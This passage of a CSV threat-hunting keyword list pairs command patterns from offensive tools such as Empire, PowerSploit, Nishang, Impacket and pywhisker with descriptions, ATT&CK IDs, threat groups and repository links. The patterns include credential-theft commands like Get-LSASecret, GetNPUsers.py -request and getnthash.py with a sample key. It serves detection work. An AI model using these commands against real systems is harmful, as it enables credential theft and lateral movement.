TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-LSASecret*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Get-ModifiableRegistryAutoRun*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard 
Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ModifiableRegistryAutoRun*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-ModifiableScheduledTaskFile*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ModifiableScheduledTaskFile*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-ModifiableService*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-MpComputerStatus*,greyware_tool_keyword,powershell,Gets the status of antimalware software on the computer.,T1063,TA0005 - TA0007,N/A,N/A,Discovery,https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Get-NetComputer -Unconstrainuser*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-NetDomainController*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetDomainTrust*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*get-netfileserver -domain *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-NetFileServer*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-NetFileServer*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetForestCatalog*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetForestDomain*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetForestDomain*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-NetForestTrust*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetGPOGroup*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetGroupMember -GroupName *DNSAdmins*,greyware_tool_keyword,powershell,the command is used to discover the members of a specific domain group DNSAdmins which can provide an adversary with valuable information about the target environment. The knowledge of group members can be exploited by attackers to identify potential targets for privilege escalation or lateral movement within the network.,T1069.001,TA0007,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Get-NetLocalGroup*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetLoggedon -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-NetLoggedon*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetRDPSession -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-NetRDPSession*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetSession*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetShare*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetSubnet*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetUser -SPN*,greyware_tool_keyword,powershell,PowerView Find users with SPN,T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Get-NetUser -SPN*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-NetUser -UACFilter NOT_ACCOUNTDISABLE*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*getNimplantByGuid*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*GetNPUsers.py -request*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*GetNPUsers.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with 
network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*getnthash.py -key *,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72'*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*getnthash.py*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,1,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z -*Get-NTLM.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z 
-*GetNTLMChallengeBase64*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*getPac.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Get-PacketNetBIOSSessionService*,offensive_tool_keyword,empire,Empire scripts functions. 
